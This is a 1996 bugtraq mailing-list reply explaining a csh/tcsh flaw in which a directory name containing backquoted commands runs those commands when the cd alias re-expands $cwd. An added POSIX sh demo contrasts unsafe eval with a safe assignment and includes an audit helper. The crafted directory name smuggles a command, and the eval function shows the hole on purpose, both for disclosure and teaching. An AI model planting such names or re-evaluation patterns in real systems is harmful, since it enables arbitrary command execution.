List:       bugtraq
Subject:    Re: tee see shell problems
From:       Paul Szabo <szabo_p () maths ! su ! oz ! au>
Date:       1996-09-18 10:44:09

> A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
> out with BSDI anyway.) that allows the execution of arbitrary commands
> when changing into directories that are enclosed with backticks.

It seems to me that the problem may be with the way you define your cd
command: surely it is the expansion of $cwd, if containing backquotes, that
does the damage. (csh is known to do several passes of variable and command
substitution.) I have the following under /bin/csh, both with Apollo
Domain/OS and DEC Alpha OSF/1 (dUNIX v3.2 or v4.0):

tmp% pwd
/tmp
tmp% which cd
alias/cd 'chdir !*; set prompt="$cwd:t% "'
tmp% mkdir '`echo you lose; touch silly`'
tmp% ls -l
total 1
drwx------   2 psz      system       512 Sep 18 10:28 `echo you lose; touch silly`
tmp% cd *echo*
you lose% pwd
/tmp/`echo you lose; touch silly`
you lose% ls -l
total 0
-rw-------   1 psz      system         0 Sep 18 10:28 silly

Paul Szabo - System Manager   //        School of Mathematics and Statistics
psz@maths.usyd.edu.au         //   University of Sydney, NSW 2006, Australia
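
Added example, not part of the original message: a POSIX sh analog of the double evaluation described above (csh itself is not used here). The function names are hypothetical and the directory name is the constructed one from the transcript; `eval` stands in for the alias body being parsed again after `$cwd` is substituted, and `risky_dirs` is an audit helper for finding such names.

```shell
#!/bin/sh
# Added illustration, not from the original post. POSIX sh stands in for csh;
# function names are hypothetical and the directory name is constructed.

# Unsafe: the directory name is pasted into text that the shell parses again.
# This mirrors the alias body being re-parsed after $cwd was substituted, so
# backquotes inside the name are run as a command substitution.
set_prompt_unsafe() {
    eval "prompt=\"${1##*/}% \""
}

# Safe: a plain assignment expands $1 once; the result is data, never re-parsed.
set_prompt_safe() {
    prompt="${1##*/}% "
}

# Audit helper: list directories under $1 whose names contain a backquote or "$(".
risky_dirs() {
    find "$1" -type d \( -name '*`*' -o -name '*$(*' \) -print
}

# Demo in a throwaway directory (subshell, so the caller's cwd is untouched).
demo() (
    sandbox=$(mktemp -d) || exit 1
    name='`echo you lose; touch silly`'      # constructed, same as in the post
    mkdir "$sandbox/$name" && cd "$sandbox/$name" || exit 1
    set_prompt_safe "$PWD"
    printf 'safe prompt:   [%s] silly exists: %s\n' "$prompt" "$([ -e silly ] && echo yes || echo no)"
    set_prompt_unsafe "$PWD"
    printf 'unsafe prompt: [%s] silly exists: %s\n' "$prompt" "$([ -e silly ] && echo yes || echo no)"
    printf 'flagged by audit: %s\n' "$(risky_dirs "$sandbox")"
    cd / && rm -rf "$sandbox"
)
demo
```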
